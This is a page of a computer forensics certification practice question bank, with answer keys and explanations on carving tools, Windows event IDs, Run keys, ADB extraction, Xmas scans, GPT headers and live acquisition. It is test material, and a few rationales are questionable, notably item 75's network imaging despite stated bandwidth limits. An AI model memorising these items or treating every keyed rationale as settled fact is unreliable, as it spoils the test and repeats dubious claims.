E.dd
AnswersC, D

PhotoRec is a legitimate file carving tool developed by Christophe Grenier as part of the TestDisk suite. It scans raw disk images or partitions by reading data block by block and matching known file signatures to reconstruct files independent of the filesystem metadata. It is especially effective for recovering photos and other multimedia from formatted or damaged media, making it a correct answer to the question.

Why this answer

PhotoRec (C) is a file-carving tool that recovers files by scanning raw disk or image data for known file signatures and reconstructing content without relying on filesystem metadata. Foremost (D) is likewise a signature-based carving utility originally developed for law enforcement that recovers files from disk images and unallocated space using header/footer patterns. WinPmem (A) is a memory acquisition tool, not a carving tool, so it does not belong.

FTK Imager (B) is primarily a forensic imaging and preview tool rather than a file carver. dd (E) is a low-level bit-stream imaging/copying utility, not a carving tool.

Exam trap

The CHFI exam often tests the distinction between acquisition/imaging tools (like dd, FTK Imager, WinPmem) and file carving tools (like PhotoRec, Foremost), so candidates mistakenly select tools that create forensic images or capture memory instead of those that recover files from raw data.

67
MCQeasy

A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?

A.A failed logon attempt
B.A successful user logon
C.A service was installed
D.A new user account was created
AnswerA

Event ID 4625 is the Windows Security log event that specifically records a failed logon attempt. It is generated whenever an authentication fails, carrying details such as the target account name, source IP address, logon type, and a status/error code like 0xC000006A (bad password). Since the question centers on this exact event identifier, the security analyst correctly identifies the event as a failed logon.

Why this answer

Event ID 4625 in the Windows Security log specifically indicates a failed logon attempt. This event is generated by the Local Security Authority Subsystem Service (LSASS) whenever an authentication attempt fails, regardless of the logon type (interactive, network, service, etc.). The event details include the account name, source IP address, and failure reason code (e.g., 0xC000006D for bad username/password).

Exam trap

The trap here is that candidates confuse Event ID 4625 with 4624 (successful logon) or assume any Security log event with 'logon' in the name indicates success, but CHFI tests the precise numeric ID and its specific meaning.

How to eliminate wrong answers

Option B is wrong because a successful user logon is recorded as Event ID 4624, not 4625. Option C is wrong because a service installation is logged under System log with Event ID 7045 (Service Control Manager), not in the Security log. Option D is wrong because a new user account creation is recorded as Event ID 4720 in the Security log, not 4625.

68
MCQmedium

In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?

A.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
B.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
C.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
D.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run
AnswerC

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run is the correct answer because it is a machine-wide authority under the HKLM root, which is visible to and processed for every user who logs onto the system. Programs specified in its String or ExpandString values are executed automatically with the user's privileges at each logon. This persistence location is commonly targeted by malware, and forensic analysts check it to identify software that runs for all users.

Why this answer

The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run registry key stores programs that automatically start at system boot for all users. This is a system-wide location, meaning any executable listed here runs regardless of which user logs in, making it critical for forensic analysis of persistent malware or unauthorized startup applications.

Exam trap

EC-Council often tests the distinction between system-wide (HKLM) and per-user (HKCU) Run keys, and candidates mistakenly choose HKEY_CURRENT_USER because it is more commonly referenced in everyday Windows use, forgetting the 'for all users' requirement in the question.

How to eliminate wrong answers

Option A is wrong because HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run applies only to the currently logged-in user, not all users. Option B is wrong because HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services controls Windows services (which start via the Service Control Manager), not standard startup programs listed in the Run key. Option D is wrong because NTUSER.DAT is the registry hive for a specific user profile, and its path is per-user, not system-wide; it cannot affect all users at boot.

69
MCQmedium

A security analyst notices a process named 'svchost.exe' running from the directory 'C:\Users\Public\svchost.exe'. This is suspicious because legitimate svchost.exe runs from 'C:\Windows\System32'. What type of indicator is this?

A.Network indicator
B.Behavioural indicator
C.File hash indicator
D.Registry key indicator
AnswerB

The correct classification is a behavioral indicator because the security analyst is observing an execution pattern—svchost.exe running from a path other than its legitimate C:\Windows\System32 location. Behavioral indicators focus on deviations from known-good baseline activities, such as unusual process paths, command-line arguments, or parent-child process relationships. This process's anomalous path is a classic sign of masquerading or binary planting, making it a host-based behavioral red flag.

Why this answer

B is correct because the presence of svchost.exe in C:\Users\Public\ instead of C:\Windows\System32 indicates a deviation from the expected execution path, which is a classic behavioral indicator. Behavioral indicators focus on anomalous actions or file placements rather than static attributes like hashes or network traffic.

Exam trap

EC-Council often tests the distinction between static indicators (file hash, registry key) and dynamic indicators (behavioral, network), and the trap here is that candidates confuse a file path anomaly with a network or registry indicator because they associate svchost.exe with system-level activity.

How to eliminate wrong answers

Option A is wrong because a network indicator would involve IP addresses, domain names, or communication patterns (e.g., DNS queries to a C2 server), not the file path of a running process. Option C is wrong because a file hash indicator is a static signature (e.g., MD5/SHA-1 hash) used to identify known malware, not the location or behavior of a process. Option D is wrong because a registry key indicator involves modifications to Windows Registry keys (e.g., Run keys for persistence), not the file system path of an executable.

70
Multi-Selectmedium

A forensic analyst is examining an Android device using ADB extraction. Which TWO statements about ADB extraction are true?

Select 2 answers
A.ADB extraction requires USB debugging to be enabled on the device
B.ADB extraction allows full file system access without root
C.ADB extraction can acquire a physical image of the device
D.ADB extraction can recover deleted files from unallocated space
E.ADB extraction requires the device to be authorized to the computer
AnswersA, E

ADB cannot communicate with an Android device unless USB debugging is enabled in Developer Options, which starts and configures the adbd daemon to accept commands over the USB transport; without it, the device appears offline to the host. For a forensic analyst, toggling this setting modifies system settings, so its status and any resulting evidence-integrity impact must be documented before beginning logical acquisition.

Why this answer

Option A is correct because ADB (Android Debug Bridge) communication over USB is only possible when the device has USB debugging enabled in Developer Options; without it, the adb daemon on the host cannot establish a session with the device. Option E is correct because, once USB debugging is on, the device presents an RSA key fingerprint prompt and the host must be authorized (the device stores the host's public key in adb_keys); an unauthorized host is rejected, so the analyst must accept the prompt or pre-provision the key. Option B is wrong because non-rooted ADB access is confined to the shell user's permissions and cannot read protected app data or system partitions.

Option C is wrong because ADB extraction is a logical acquisition (e.g., adb pull, adb backup) and cannot produce a bit-for-bit physical image of the flash storage. Option D is wrong because deleted files in unallocated space are only recoverable from a physical image or raw flash dump, not through ADB's logical file-level access.

Exam trap

The CHFI exam often tests the misconception that ADB extraction provides full file system or physical access, but the trap is that ADB is a logical extraction method with significant privilege restrictions, and candidates confuse 'ADB backup' or 'ADB pull' with physical imaging capabilities.

71
MCQhard

An organization receives a litigation hold notice regarding an ongoing lawsuit. The IT administrator is instructed to preserve all relevant electronic records. Which of the following actions is MOST consistent with proper legal hold implementation?

A.Reboot all servers to ensure they are running the latest patches.
B.Immediately delete all emails older than 90 days to reduce data volume.
C.Place a hold on all data that may be relevant by suspending routine deletion and notifying custodians.
D.Encrypt all data and change access passwords to prevent unauthorized access.
AnswerC

The correct first step is to issue legal hold notices and suspend all routine deletion, retention-policy enforcement, and any automated purging processes for data that could plausibly relate to the litigation. This ensures the organization preserves electronically stored information (ESI) in its current form, maintains a defensible preservation process, and places custodians on notice of their obligation not to alter or destroy relevant data. A comprehensive litigation hold must also involve forensically preserving the data and identifying all sources (email, documents, databases, cloud systems) to satisfy discovery obligations.

Why this answer

A litigation hold (also known as a legal hold) requires suspending routine data deletion and preservation of potentially relevant electronically stored information (ESI). The IT administrator must notify custodians and implement a hold that prevents automated purging (e.g., via retention policies in Exchange or file servers) to comply with the duty to preserve evidence under FRCP Rule 37(e).

Exam trap

The CHFI exam often tests the misconception that data preservation means securing data through encryption or access control, rather than the core requirement of suspending deletion and notifying custodians to prevent spoliation.

How to eliminate wrong answers

Option A is wrong because rebooting servers for patching is a routine maintenance action that does not preserve data and could alter system state or logs, potentially spolating evidence. Option B is wrong because deleting emails older than 90 days violates the preservation obligation by destroying potentially relevant ESI, which could lead to spoliation sanctions. Option D is wrong because encrypting all data and changing passwords may render evidence inaccessible to forensic examiners and legal teams, and does not ensure preservation of the original data in a forensically sound manner.

72
MCQhard

A forensic analyst is examining a network intrusion detection system (NIDS) alert that triggered on a packet with the FIN, PSH, and URG flags set. What type of scan does this indicate?

A.Xmas scan
B.NULL scan
C.SYN scan
D.ACK scan
AnswerA

A Christmas tree (Xmas) scan sends TCP packets with the FIN, PSH, and URG flags simultaneously enabled, creating a deliberate anomaly that evades stateless packet filters and forces RFC-compliant hosts to respond in distinct ways: closed ports return a RST, while open ports drop the packet silently. This flag combination is the key signature that IDS/IPS systems use to flag an Xmas scan, and it is fundamentally different from single-flag scans because the unusual number of set bits is itself a heuristic indicator.

Why this answer

A is correct because an Xmas scan sends packets with the FIN, PSH, and URG flags set (like a Christmas tree lit up). According to RFC 793, a closed port must respond with an RST packet, while an open port should drop the packet silently (no response). The NIDS alert triggered on these three flags together, which is the signature of an Xmas scan.

Exam trap

EC-Council often tests the distinction between Xmas, NULL, and SYN scans by focusing on the exact flag combinations; the trap here is that candidates confuse the FIN, PSH, URG combination with a NULL scan (no flags) or a SYN scan (single flag).

How to eliminate wrong answers

Option B is wrong because a NULL scan sends packets with no flags set (all flags off), not the FIN, PSH, and URG flags. Option C is wrong because a SYN scan sends packets with only the SYN flag set, used for half-open connections, not the combination of FIN, PSH, and URG. Option D is wrong because an ACK scan sends packets with only the ACK flag set, used to map firewall rules, not the FIN, PSH, and URG flags.

73
MCQhard

A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?

A.PowerShell was executed as part of a scheduled task or service
B.The prefetch file is corrupted
C.The user deleted their profile
D.The system clock was changed
AnswerA

PowerShell launched via a scheduled task or service executes under logon type 4 (batch) or 5 (service), not interactive logon type 2. Consequently, the Security log will not contain a corresponding 4624 interactive logon event, even though prefetch records the powershell.exe execution with a valid last run time. This exactly matches the observed discrepancy, making non-interactive execution the correct forensic explanation.

Why this answer

A is correct because PowerShell.exe can be executed by non-interactive processes such as scheduled tasks or services, which do not generate interactive logon events (Event ID 4624) in the Security log. The prefetch file records the last run time regardless of the execution context, so a discrepancy between the prefetch timestamp and the absence of interactive logons indicates that PowerShell was launched by a system-level or automated mechanism, not by a user logging on interactively.

Exam trap

EC-Council often tests the misconception that prefetch files only record user-initiated executions, leading candidates to assume the timestamp must be wrong or that the user must have logged on, when in fact prefetch captures all executions including those from system services and scheduled tasks.

How to eliminate wrong answers

Option B is wrong because prefetch files are not typically corrupted in a way that would produce a plausible last run time without any corresponding logon activity; corruption would more likely result in unreadable timestamps or missing entries. Option C is wrong because deleting a user profile does not remove prefetch entries or alter the last run time recorded for an executable; the prefetch file would still reflect the last execution before deletion. Option D is wrong because changing the system clock would affect all timestamps uniformly, including both the prefetch file and security logs, so it would not create a discrepancy between the two; the discrepancy would only occur if the clock change was applied between the execution and the log generation, which is not a typical forensic scenario.

74
MCQmedium

During a forensic investigation of a hard disk, the investigator finds that the partition table is missing. The disk was previously partitioned using GPT. Which area of the disk should be examined to recover the GPT partition table?

A.Last sector of the disk
B.Volume boot record
C.Master Boot Record (LBA 0)
D.LBA 1 (sector 1)
AnswerD

The primary GPT header is stored at LBA 1 (sector 1), immediately following the protective MBR at LBA 0. This header contains the disk GUID, the location of the partition entry array (typically LBA 2–33), entry counts, CRC32 integrity checks, and pointers to the backup GPT at the last sector. Because the GPT layout specifically starts here, LBA 1 is the correct answer.

Why this answer

In GPT (GUID Partition Table) disks, the primary partition table is stored in LBA 1 (sector 1), immediately following the protective MBR at LBA 0. When the partition table is missing, examining LBA 1 allows recovery of the GPT header, which contains pointers to the partition entry array. This is the correct location because GPT uses LBA 1 for its header, not the last sector or the MBR.

Exam trap

The CHFI exam often tests the misconception that the GPT partition table is stored in the MBR (LBA 0) or the last sector, but the primary GPT header is specifically at LBA 1, while the backup is at the last sector.

How to eliminate wrong answers

Option A is wrong because the last sector of the disk stores the secondary (backup) GPT header, not the primary partition table; while it can be used for recovery, the question asks for the area to examine to recover the primary GPT partition table, which is not the last sector. Option B is wrong because the Volume Boot Record (VBR) is located within a partition (e.g., at the start of a volume) and contains boot code and BPB for that volume, not the GPT partition table. Option C is wrong because LBA 0 (Master Boot Record) in a GPT disk contains only a protective MBR (to prevent legacy tools from misidentifying the disk as unpartitioned) and does not store the GPT partition table itself.

75
MCQhard

You are a forensic investigator responding to a data breach at a financial institution. The compromised server is a Windows Server 2019 running a custom trading application. The server is still powered on and connected to the production network. The incident response team has instructed you to acquire forensic evidence while minimizing downtime. The server has 2 TB of storage with 500 GB used. You have a forensic workstation with a write-blocker and an empty 2 TB external drive. The server's RAM is 64 GB. You need to acquire both volatile data (RAM) and a forensic image of the disk. However, the legal team requires a verified bit-for-bit copy with cryptographic hash verification. Additionally, the server's performance is critical; acquiring RAM via network is not feasible due to bandwidth constraints. Which of the following is the best course of action?

A.Shut down the server, remove the disk, connect it to a write-blocker, and acquire the disk image using FTK Imager; RAM is lost but disk acquisition is verified.
B.Use FTK Imager over the network to acquire RAM first, then use dd to image the disk to the external drive via write-blocker.
C.Run win32dd locally to capture RAM to the external drive, then use FTK Imager over the network to create a physical disk image with verification.
D.Use dd over netcat to acquire RAM and disk simultaneously, then compute hashes separately.
AnswerC

This is the correct order of volatility. Running win32dd locally captures RAM quickly to an external device, minimizing the time that volatile data is at risk, and it preserves a raw memory image for later analysis. After that, FTK Imager can acquire a physical disk image over the network and automatically generate hash values (e.g., MD5/SHA1) to verify the integrity of the image at acquisition time. This combines fast volatile capture with network-acquired disk imaging that includes built-in verification.

Why this answer

It prioritizes capturing volatile RAM first using win32dd (a memory acquisition tool) locally to the external drive, which preserves the most volatile evidence before any shutdown or network transfer. After RAM capture, FTK Imager over the network creates a verified physical disk image, satisfying the legal requirement for cryptographic hash verification while minimizing downtime. This approach avoids the risk of losing RAM data (as in shutdown) and avoids bandwidth constraints (as in network RAM acquisition).

Exam trap

EC-Council often tests the misconception that network-based RAM acquisition is always feasible or that shutting down the server is acceptable, but the trap here is that candidates overlook the bandwidth constraint and the critical need to preserve volatile data before disk imaging.

How to eliminate wrong answers

Option A is wrong because shutting down the server destroys volatile data (RAM), which is critical for investigating the breach, and the legal team requires a verified bit-for-bit copy, but RAM is lost entirely. Option B is wrong because acquiring RAM over the network is explicitly stated as not feasible due to bandwidth constraints, and using dd to image the disk to the external drive via write-blocker is not described correctly (dd is a Linux tool, not native to Windows Server 2019, and FTK Imager over the network for RAM would be slow and unreliable). Option D is wrong because using dd over netcat for RAM acquisition is not a standard Windows memory acquisition method, and simultaneous acquisition of RAM and disk is impractical without proper write-blocking and verification; netcat does not provide cryptographic hash verification natively.

Page 1 of 10

Page 2

All pages